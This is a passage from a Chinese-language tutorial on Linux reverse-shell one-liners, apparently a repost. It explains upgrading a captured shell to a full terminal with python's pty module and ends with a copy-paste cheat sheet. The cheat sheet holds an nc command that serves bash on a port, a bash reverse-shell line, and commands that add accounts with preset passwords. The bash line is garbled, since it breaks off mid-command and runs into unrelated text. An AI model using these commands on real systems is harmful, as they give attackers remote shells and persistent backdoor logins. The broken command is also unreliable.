「干货」Linux环境下一句话反弹shell总结( 四 )
3.2 python 标准虚拟终端获取
我们通过各种方式获取的shell经常不稳定或者没有交互界面的原因 , 往往都是因为我们获取的shell不是标准的虚拟终端 , 此时我们其实可以借助于python来获取一个标准的虚拟终端环境 。
python在现在一般发行版Linux系统中都会自带 , 所以使用起来也较为方便 , 即使没有安装 , 我们手动安装也很方便 。
3.2.1 python 一句话获取标准shell
使用python 一句话获取标准shell的具体命令如下:
# python -c "import pty;pty.spawn('/bin/bash')"
命令详解:python 默认就包含有一个pty的标准库 。
文章插图
3.2.2 实例演示
具体(1)开启监听;(2)反弹shell;(3)会话建立的过程这里不在重复演示了 , 这里直接贴出笔者获取到反弹shell后的问题后 , 如何通过python获取标准shell的过程截图展现如下 。
文章插图
虽然到目前为止写的虚拟终端并没有原生终端那样好,但是花点时间去折腾然后不断的去完善.相信会做的更好.
大家可能在渗透测试的时候会发现有些时候系统的命令终端是不允许直接访问的,那么这个时候用Python虚拟化一个终端相信会让你眼前一亮.
四、写在最后最后将上面学习的内容做一下小结 , 以方便日后可以直接复制粘贴使用 , 笔者贴心不 , 你就说贴心补贴(ou tu bu zhi …)
4.1 nc开启本地监听发布bash服务
# nc -lvvp 12345 -t -e /bin/bash
4.2 常用反弹shell一句话
(1) bash 反弹一句话
# bash -i >pty.spawn('/bin/bash')"
4.5 linux 一句话添加账户
(1)chpasswd 方法
# useradd guest;echo 'guest:123456'|chpasswd
(2)useradd -p 方法
# useradd -p `openssl passwd 123456` guest
(3)echo -e 方法
# useradd test;echo -e "123456n123456n" |passwd test
学习参考
【「干货」Linux环境下一句话反弹shell总结】转载自:
推荐阅读
- Axiomtek推出AIE100-903-FL-NX AI Edge系统 可在恶劣环境下运行
- Linux Kernel 5.10.5发布:禁用FBCON加速滚动特性
- 当智慧社区成为新基建抓手,「亲邻科技」要用科技打造宜居环境 | 新基建创业2020
- Linux 5.11开始围绕PCI Express 6.0进行早期准备
- Fedora正在寻求协助 希望加快Linux 5.10 LTS内核测试进度
- Linux Mint 20.1 Ulyssa稳定版已确定延期至2021年初发布
- 英特尔Xe GPU在Linux 5.11上的性能表现不错
- MIPS架构厂商日渐式微 Linux报告其漏洞遭遇困难
- 预报|自然资源部国家海洋环境预报中心推出小程序
- Linux Kernel 5.11首个候选版本更新发布